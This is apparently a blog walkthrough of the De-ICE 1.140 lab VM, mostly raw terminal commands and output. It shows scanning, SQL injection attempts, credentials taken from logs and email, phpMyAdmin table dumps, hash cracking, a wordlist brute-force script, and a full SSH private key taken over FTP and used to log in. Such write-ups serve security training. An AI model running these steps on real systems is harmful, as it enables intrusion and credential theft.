2014. január 8., szerda

De-ICE 1.140

root@kali:~# netdiscover

 Currently scanning: 192.168.67.0/16   |   Screen View: Unique Hosts                                                     

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                         


   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.100  08:00:27:17:86:46    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.101  08:00:27:fe:04:1c    01    060   CADMUS COMPUTER SYSTEMS                                                

root@kali:~# unicornscan -mT 192.168.56.101
TCP open                 ftp[   21]        from 192.168.56.101  ttl 64
TCP open                 ssh[   22]        from 192.168.56.101  ttl 64
TCP open                http[   80]        from 192.168.56.101  ttl 64
TCP open               https[  443]        from 192.168.56.101  ttl 64
TCP open               imaps[  993]        from 192.168.56.101  ttl 64
TCP open               pop3s[  995]        from 192.168.56.101  ttl 64

root@kali:~# nmap -sS -sV -O 192.168.56.101 -pT:21,22,80,443,993,995

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-07 13:29 CET
Nmap scan report for 192.168.56.101
Host is up (0.00044s latency).
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      ProFTPD 1.3.4a
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
993/tcp open  ssl/imap Dovecot imapd
995/tcp open  ssl/pop3 Dovecot pop3d
MAC Address: 08:00:27:FE:04:1C (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.9, Linux 3.0 - 3.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

root@kali:~# nikto -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2014-01-07 13:35:52 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2014-01-07 13:36:02 (GMT1) (10 seconds)
---------------------------------------------------------------------------

root@kali:~# nikto -ssl -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /CN=webhost
                   Ciphers: DHE-RSA-AES256-GCM-SHA384
                   Issuer:  /CN=webhost
+ Start Time:         2014-01-08 11:50:48 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.56.101' does not match certificate's CN 'webhost'
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the secure flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the secure flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ Cookie phpMyAdmin created without the httponly flag
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Cookie SQMSESSID created without the secure flag
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2014-01-08 11:52:53 (GMT1) (125 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.101

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Tue Jan  7 13:36:44 2014
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)                                                                     

==> DIRECTORY: http://192.168.56.101/forum/                                                                              

+ http://192.168.56.101/index (CODE:200|SIZE:1782)                                                                       

+ http://192.168.56.101/index.html (CODE:200|SIZE:1782)                                                                  

+ http://192.168.56.101/server-status (CODE:403|SIZE:215)                                                                
                                  
---- Entering directory: http://192.168.56.101/forum/ ----
+ http://192.168.56.101/forum/LICENSE (CODE:200|SIZE:33093)                                                              

+ http://192.168.56.101/forum/README (CODE:200|SIZE:730)                                                                 

==> DIRECTORY: http://192.168.56.101/forum/backup/                                                                       

==> DIRECTORY: http://192.168.56.101/forum/config/                                                                       

==> DIRECTORY: http://192.168.56.101/forum/images/                                                                       

==> DIRECTORY: http://192.168.56.101/forum/includes/                                                                     

+ http://192.168.56.101/forum/index (CODE:200|SIZE:7348)                                                                 

+ http://192.168.56.101/forum/index.php (CODE:200|SIZE:7348)                                                             

==> DIRECTORY: http://192.168.56.101/forum/install/                                                                      

==> DIRECTORY: http://192.168.56.101/forum/js/                                                                           

==> DIRECTORY: http://192.168.56.101/forum/lang/                                                                         

==> DIRECTORY: http://192.168.56.101/forum/modules/                                                                      

==> DIRECTORY: http://192.168.56.101/forum/templates_c/                                                                  

==> DIRECTORY: http://192.168.56.101/forum/themes/                                                                       

==> DIRECTORY: http://192.168.56.101/forum/update/                                                                       
             
---- Entering directory: http://192.168.56.101/forum/backup/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                  
---- Entering directory: http://192.168.56.101/forum/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                  
---- Entering directory: http://192.168.56.101/forum/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/install/ ----
+ http://192.168.56.101/forum/install/index (CODE:302|SIZE:0)                                                            

+ http://192.168.56.101/forum/install/index.php (CODE:302|SIZE:0)                                                        

+ http://192.168.56.101/forum/install/install (CODE:200|SIZE:12898)                                                      
                                  
---- Entering directory: http://192.168.56.101/forum/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/templates_c/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/update/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                              
-----------------
DOWNLOADED: 13776 - FOUND: 11

root@kali:/usr/share/dirb# dirb https://192.168.56.101 wordlists/small.txt

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Tue Jan  7 16:54:16 2014
URL_BASE: https://192.168.56.101/
WORDLIST_FILES: wordlists/small.txt

-----------------

GENERATED WORDS: 957                                                          

---- Scanning URL: https://192.168.56.101/ ----
+ https://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)                                                                    

==> DIRECTORY: https://192.168.56.101/forum/                                                                             

+ https://192.168.56.101/index (CODE:200|SIZE:1782)                                                                      

==> DIRECTORY: https://192.168.56.101/phpmyadmin/                                                                        

==> DIRECTORY: https://192.168.56.101/webmail/                                                                           
                                  
---- Entering directory: https://192.168.56.101/forum/ ----
+ Dumping session state and Quitting.                                                                                    
                                                                              
-----------------
DOWNLOADED: 1063 - FOUND: 2

http://192.168.56.101/forum/
http://192.168.56.101/forum/config/

sqlmap -u "http://192.168.56.101/forum/index.php" --data="mode=login&username=admin%27&userpw=a"
...
[13:49:41] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

http://192.168.56.101/forum/index.php?mode=user

sqlmap -u "http://192.168.56.101/forum/index.php?mode=user"
...
[13:53:05] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

admin     Admin           E-mail
MBrown     User           E-mail
RHedley     User           E-mail
SWillard     Moderator           E-mail

Sandy (sw@lazyadmins.corp)
Mark
Richy

sqlmap -u "http://192.168.56.101/forum/index.php?mode=user&show_user=1"
...
[13:56:03] [ERROR] possible integer casting detected (e.g. "$show_user=intval($_REQUEST['show_user'])") at the back-end web application do you want to skip those kind of cases (and save scanning time)? [y/N] y
[13:56:06] [INFO] skipping GET parameter 'show_user'
[13:56:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

http://192.168.56.101/forum/index.php?mode=contact&user_id=2

powered by my little forum

page source:
my little forum 2.3.1

forum:

Mar 7 11:15:28 testbox sshd[5766]: Connection from 10.10.2.131 port 46487
...
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
...
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2

by SWillard @, Monday, March 11, 2013, 09:43 (302 days ago)

Hi everybody

As you all know I I got married a few days before (yay :-D)
And because of this I have changed my email-account to match MY NEEEWWW NAME :-D

Bye
Sandy Willard formally known as Sandy Raines ;)

https://192.168.56.101/forum/install/install

CREATE TABLE mlf2_userdata (user_id int(11) NOT NULL auto_increment, user_type tinyint(4) NOT NULL default '0', user_name varchar(255) NOT NULL default '', user_real_name varchar(255) NOT NULL default '', gender tinyint(4) NOT NULL default '0', birthday date NOT NULL default '0000-00-00', user_pw varchar(255) NOT NULL default '', user_email varchar(255) NOT NULL default '', email_contact tinyint(4) default '0', user_hp varchar(255) NOT NULL default '', user_location varchar(255) NOT NULL default '', signature varchar(255) NOT NULL default '', profile text NOT NULL, logins int(11) NOT NULL default '0', last_login timestamp NOT NULL default CURRENT_TIMESTAMP, last_logout timestamp NOT NULL default '0000-00-00 00:00:00', user_ip varchar(128) NOT NULL default '', registered timestamp NOT NULL default '0000-00-00 00:00:00', category_selection varchar(255) DEFAULT NULL, thread_order tinyint(4) NOT NULL default '0', user_view tinyint(4) NOT NULL default '0', sidebar tinyint(4) NOT NULL default '1', fold_threads tinyint(4) NOT NULL default '0', thread_display tinyint(4) NOT NULL default '0', new_posting_notification tinyint(4) default '0', new_user_notification tinyint(4) default '0', user_lock tinyint(4) default '0', auto_login_code varchar(50) NOT NULL default '', pwf_code varchar(50) NOT NULL, activate_code varchar(50) NOT NULL default '', language VARCHAR(255) NOT NULL DEFAULT '', time_zone VARCHAR(255) NOT NULL DEFAULT '', time_difference smallint(4) default '0', theme VARCHAR(255) NOT NULL DEFAULT '', entries_read TEXT NOT NULL, PRIMARY KEY (user_id)) CHAR SET=utf8 COLLATE=utf8_general_ci;
...

INSERT INTO mlf2_userdata VALUES (1, 2, 'admin', '', 0, '0000-00-00',
'c3ccb88dc0a985b9b5da20bb9333854194dfbc7767d91c6936', 'admin@example.com', 1, '', '', '', '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '', NOW(), NULL, 0, 0, 1, 0, 0, 0, 0, 0, '', '', '', '', '', 0, '', '');

http://192.168.56.101/forum/index.php?mode=login

user : mbrown
pass: !DFiuoTkbxtdk0!

http://192.168.56.101/forum/index.php?mode=user&action=edit_profile

E-mail:     mb@lazyadmin.corp

Log out

https://192.168.56.101/webmail/src/login.php

username mb@lazyadmin.corp
pass: !DFiuoTkbxtdk0!

https://192.168.56.101/webmail/src/read_body.php?mailbox=INBOX&passed_id=2&startMessage=1

From:       sw@lazyadmin.corp
Date:       Sun, March 10, 2013 9:23 am
To:       mb@lazyadmin.corp
Priority:       Normal
Options:       View Full Header |  View Printable Version  | Download this as a file

Hi,

here are the login-informations for mysql:

Username: root
Password: S4!y.dk)j/_d1pKtX1


Regards,
Sandy

Subject:       Audit
From:       sw@lazyadmin.corp
Date:       Sat, March 16, 2013 8:19 pm
To:       mb@lazyadmin.corp
Priority:       Normal
Options:       View Full Header |  View Printable Version  | Download this as a file

Hi Mark,

last we have made a password audit for all of our systems and we have seen
that you are using the same password for a few services.
Please be so kind and change your passwords. Please keep in mind to use
different passwords for different services. :)

Thank you!
Sandy

https://192.168.56.101/phpmyadmin/

https://192.168.56.101/phpmyadmin/Documentation.html
phpMyAdmin 3.4.10.1 Documentation

https://192.168.56.101/phpmyadmin/index.php?

user : root
pass: S4!y.dk)j/_d1pKtX1

Exporting rows from "mlf2_userdata" table

"1","2","admin",,"0","0000-00-
00","fd339d53bf599d4ec7281ace84a902dc2ca16c7f63cbb16261","webmaster@lazyadmin.corp","1",,,,,"10","2013-03-24 19:03:02","2013-03-24 19:08:31","192.168.8.1","2013-03-09
15:57:17",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"2","0","RHedley","Richard Hedley","1","0000-00-00","31cbbdab9f5e1ebfa7d81267c258e29b5f9e171e6fcf7b1ba3","rh@lazyadmin.corp","1",,,,,"5","2013-03-24 19:09:38","2013-03-24 19:09:52","192.168.8.1","2013-03-09 16:22:22",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"3","0","MBrown","Mark Brown","1","0000-00-00","8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1","mb@lazyadmin.corp","1",,,,,"7","2014-01-07 17:02:50","2014-01-07 17:02:50","192.168.56.102","2013-03-09 16:23:28",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"15,4,2,1,3,5,9,10,11,12,13,14,7,6,8"
"4","1","SWillard","Sandy Willard","2","0000-00-00","c19038340b8f5d1fc70e9bfbc3336f7bf1e0935da5ef13d4ef","sw@lazyadmin.corp","1",,,,,"8","2013-03-24 19:09:08","2013-03-24 19:09:27","192.168.8.1","2013-03-09 16:25:13",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"

Exporting rows from "admin" table
"postfix@lazyadmin.corp","d189d0c727a549f263b93176fc851cec","2013-03-0917:34:21","2013-03-24 19:01:06","1"

Exporting rows from "mailbox" table
"rh@lazyadmin.corp","20f1275ce5e67be2c06476333b68f585","Richard Hedley","rh@lazyadmin.corp/","0","rh","lazyadmin.corp","2013-03-09 18:55:10","2013-03-24 19:02:10","1"
"sw@lazyadmin.corp","07255e7701a86ad1672765d15082f1a3","Sandy
Willard
","sw@lazyadmin.corp/","0","sw","lazyadmin.corp","2013-03-09 18:56:35","2013-03-24 19:02:23","1"
"mb@lazyadmin.corp","d768176c4486ce77787c73883406fe97","Mark Brown","mb@lazyadmin.corp/","0","mb","lazyadmin.corp","2013

-03-09 18:56:55","2013-03-24 19:01:37","1"
"mp@lazyadmin.corp","fa514a9f39391658b15d5db542029aa6","Miles
Parker
","mp@lazyadmin.corp/","0","mp","lazyadmin.corp","2013-03-09 21:14:40","2013-03-24 19:01:57","1"

Exporting rows from "user" table
"localhost","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y

","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"ubuntu","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","
Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"127.0.0.1","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y
","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"::1","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",
"Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"localhost",,,"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N"
,"N","N",,,,,"0","0","0","0",,NULL
"ubuntu",,,"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N
","N",,,,,"0","0","0","0",,NULL
"localhost","debian-sys-maint","*27F84EF9FAA0E841963E4963EFC8D0EC7443A820","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y
","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","N",,,,,"0","0","0","0",,NULL
"localhost","phpmyadmin","*1E8775B9D4F8EF5A6722E7E0C57BA5985872FB98","N","N","N","N","N","N","N","N","N","N","N","N","N",
"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","mail","*0616BA40862AA9B5B194CD196808176F644B2828","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N
","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","forum","*FEAFF5308E872DB9CFBB7585CD62CB7383B53E75","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","
Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,NULL

https://crackstation.net/
20f1275ce5e67be2c06476333b68f585
07255e7701a86ad1672765d15082f1a3
d768176c4486ce77787c73883406fe97
fa514a9f39391658b15d5db542029aa6

20f1275ce5e67be2c06476333b68f585
    md5    tum-ti-tum
07255e7701a86ad1672765d15082f1a3
    md5    Austin-Willard
d768176c4486ce77787c73883406fe97    Unknown    Not Found
fa514a9f39391658b15d5db542029aa6    Unknown    Not Found

root@kali:/usr/share/dirb# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.101:root): rhedley
331 Password required for rhedley
Password: (tum-ti-tum)
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd ..
250 CWD command successful
ftp> pwd
257 "/" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete

ftp> cd ftp
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx   1 ftp      ftpadmin       60 May 13  2013 incoming
226 Transfer complete
ftp> cd incoming
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc

ftp> get backup_webhost_130111.tar.gz.enc
local: backup_webhost_130111.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (63067.8 kB/s)

root@kali:~# hd backup_webhost_130111.tar.gz.enc | more

00000000  53 61 6c 74 65 64 5f 5f  6e 39 35 1e fa ac ea b9  |Salted__n95.....|
00000010  13 37 de 82 6f 35 c8 5c  ad 90 eb 83 12 eb 05 af  |.7..o5.\........|
00000020  4f 7c b2 0d 51 ad f6 41  cd 7f 80 81 78 cf d7 7a  |O|..Q..A....x..z|

This is an openssl salted decrypted file

I made an encrypt.sh:

#!/bin/bash

while IFS= read -r LINE; do
  echo "$LINE"
  openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:$LINE
  if [ $? -eq 0 ]
    then break
  fi
done < /usr/share/wordlists/metasploit-jtr/password.lst

./encrypt.sh
...
abscond
bad decrypt
3074345112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:
absconder

The password is absconder?

root@kali:~# openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:absconder -p
salt=6E39351EFAACEAB9
key=61F734DD3D559913060B3A5F164B853A4D3777688F334E46
iv =677740BB2E10FD0A




root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: data

Something is wrong....

root@kali:~# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.102:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd mbrown/.ssh
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 mbrown   mbrown       1675 Mar 10  2013 downloadkey
-rw-------   1 mbrown   mbrown       1675 Mar 10  2013 id_rsa
-rw-r--r--   1 mbrown   mbrown        396 Mar 10  2013 id_rsa.pub
226 Transfer complete
ftp> get downloadkey
local: downloadkey remote: downloadkey
200 PORT command successful
150 Opening BINARY mode data connection for downloadkey (1675 bytes)
226 Transfer complete
1675 bytes received in 0.00 secs (5002.3 kB/s)
ftp> get id_rsa.pub
local: id_rsa.pub remote: id_rsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa.pub (396 bytes)
226 Transfer complete
396 bytes received in 0.00 secs (4345.2 kB/s)
ftp>

root@kali:~# more downloadkey
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAp/+cwyFvPJxPw8uRJzcTl+fK6/O6ywThG2ss4pdt6FQH5MMO
eCDadMEvTI1z5tmvjt3CUqueKWt/WIg0+MUZ//zOvCncJ3WZoGsmQ4UEIvDTfWwj
+CqXMTbR5Lz/ywQ3BT/9lZre/LKxVS9WimYIMFsp5Xpl26vbIs9MLzSIpP7u3LlF
cOEZ8Qgom4NeIENdYeSRovSpOuIGTlmY6IveKhQYS9AUrCBf3UFL44qEG0FGDC5C
iUtUgLG1EJE9/y7Q15hfdgcdSntCfSyLtHZKelBe3wfqcGQnnLqOMB8yjl1zgfsF
8/sdAUST3/WJ9AOEi6AJmpe1BE/MoeXteXkcRwIDAQABAoIBAA6zgJ1WxKwyJYzF
uJsM58sIPqqtNnBjqetDUrc1dym4iMRNCWwbu+IxsZjqW/UcoY9H+qRPXlTTkl5F
9RS78s2C6vhuVVSipuHx3nRUJIuGNYupNfCWkYp9+Joiq+OxJ7tu4RsBZXgJjxkc
Pl94FElfAOiS8Gzrug5uw4Tx/O8rN6D6n3IkPiUwQzxhGsRYP+fl9CRV3NhMJAYG
8T8TIJYjocj0dyLXOUJW7+ejUgbIxxtbYQGspafuzvqH/s6ockgQIzQki0Mdhrhg
0aj4KImKhkkOaqs0/hySDSvm/Nwdc/WuhsiIK90uPTwkq2MZbepgKyRRB2kxokQS
qx+pGfECgYEA0q5ZXYl8eFsm/tmgc/jzllqswGmFYXXqUw2f6IB3HUDvfLm0h3vu
WMlxU9gHq8gSn3cUDWjMFAwGn6Ylz1KZlkL/RzhKfrwUlOWj65BC/jQSywVBkvKw
cXUX8mblKiITgL7dK2VdpiIz9ObyT7P9Vbmig0b/Kfz2s7/CfLfVi/8CgYEAzCLY
xGHk6JXn7d5wi4uReUMKGyHdksEhHDCRXlxegs6eQAlHyK1jtJsDP051VaoOj4sJ
fyJ6A61h+GK+OJaQokCR/D2RyxNjP5Ak8l/YWOufTFvojACYpYY3WsARmfBb+pFe
M4S1Gts4sAHmXhrZRrXdUUZUqRraWU8xRP8ND7kCgYEAgxrKM+IN2hvnPWqSZfkD
JIqSvD4uKYMmab6txxLCjSrOnZA23qTposjgxCtIQscDh8ajbODNNqBxMsJC/yxI
tXBFyb0m5o0GRc5N3pZsiiI/m6VOtDJgSIp0d30+mKSR/GlJ2up+h5b7PCjHm3/H
Y6RclFMHEMsBfsQTNGd19WMCgYBSIObzQ6t0A/O22NqQ2gsiLV2gguSBSaBHlia2
PxVrLTOv8cvmqhPGMuOAkdFVMMEA8WBVvQo39obHBvsfCzyPeskBIchJWriAdz7W
IMeLJukFMKkDwq2nUrNsmH+8Xl6zFc8/jPHMJ0zMS0dirwyhjUPIkjI3gu08J0dc
Sfz4SQKBgDpL2Dy1naY2Ji36Bdw8+uNle1CitzXa2pDIvDMWcSl3nvebxM86bcxe
8idZCSpjrr8dLC+dlwok3K/xwrQN1bn3hOLmc0jmMmCFDdUbImfDaAr+6IQU12ka
/F+lTnJDgosnUtgu/eUd+Uh41SVG55oCC404DyZbcIM9rLYkgaDe
-----END RSA PRIVATE KEY-----

root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'downloadkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: downloadkey
Permission denied (publickey).
root@kali:~# chmod 600 downloadkey
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$

mbrown@webhost:~$ uname -a
Linux webhost 3.5.0-28-generic #48~precise1-Ubuntu SMP Wed Apr 24 21:43:05 UTC 2013 i686 i686 i386 GNU/Linux
mbrown@webhost:~$ pwd
/home/mbrown

mbrown@webhost:~$ su rhedley
Password:
rhedley@webhost:/home/mbrown$

... some privilege escalation processes...

rhedley@webhost:/home/mbrown$ cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp

TMPBACKUP="/tmp/backup";

NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
